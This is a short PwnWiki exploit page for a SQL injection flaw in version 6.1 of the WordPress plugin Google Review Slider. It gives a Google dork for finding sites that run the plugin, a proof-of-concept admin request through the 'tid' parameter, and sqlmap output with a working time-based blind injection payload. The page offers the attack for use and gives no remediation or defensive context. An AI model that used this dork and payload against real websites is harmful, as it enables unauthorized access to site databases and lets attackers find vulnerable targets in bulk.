WordPress Plugin - Google Review Slider 6.1 SQL注入漏洞

From PwnWiki
Revision as of 18:24, 15 April 2021 by Pwnwiki (talk | contribs) (Created page with "==Google Dork== <pre> inurl:"/wp-content/plugins/wp-google-places-review-slider/" </pre> ==POC== <pre> GET/wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=*...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

Google Dork

inurl:"/wp-content/plugins/wp-google-places-review-slider/"

POC

 GET/wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***
 &taction=edit HTTP/1.1

SQLMAP

sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
---
Parameter: tid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=wp_google-templates_posts&tid=1 AND (SELECT 5357 FROM
(SELECT(SLEEP(5)))kHQz)&_wpnonce=***&taction=edit
Retrieved from "https://pwnwiki.com/index.php?title=WordPress_Plugin_-_Google_Review_Slider_6.1_SQL注入漏洞&oldid=1690"